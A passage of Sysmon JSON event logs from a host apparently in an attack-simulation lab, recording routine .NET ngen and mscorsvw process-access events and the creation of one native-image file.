C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.511","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010DDD40E00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7096,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.511\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010DDD40E00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.511","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010DDD40E00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7097,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.527\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010DDD40E00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.527","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010DDD40E00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7098,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.699\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-001085D80E00}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.699","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-001085D80E00}","TargetProcessId":"4868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.699\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-001085D80E00}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.699","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-001085D80E00}","TargetProcessId":"4868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.715\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-001085D80E00}\r\nTargetProcessId: 4868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.715","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-001085D80E00}","TargetProcessId":"4868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:58:43.824\r\nProcessGuid: {A837DB8D-0493-5F25-0000-001085D80E00}\r\nProcessId: 4868\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1304-0\\Microsoft.Workflow.Compiler.exe\r\nCreationUtcTime: 2020-08-01 05:58:43.824","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:58:43.824","ProcessGuid":"{A837DB8D-0493-5F25-0000-001085D80E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1304-0\\Microsoft.Workflow.Compiler.exe","CreationUtcTime":"2020-08-01 05:58:43.824","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.855\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00101ADD0E00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.855","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00101ADD0E00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.855\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00101ADD0E00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.855","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00101ADD0E00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
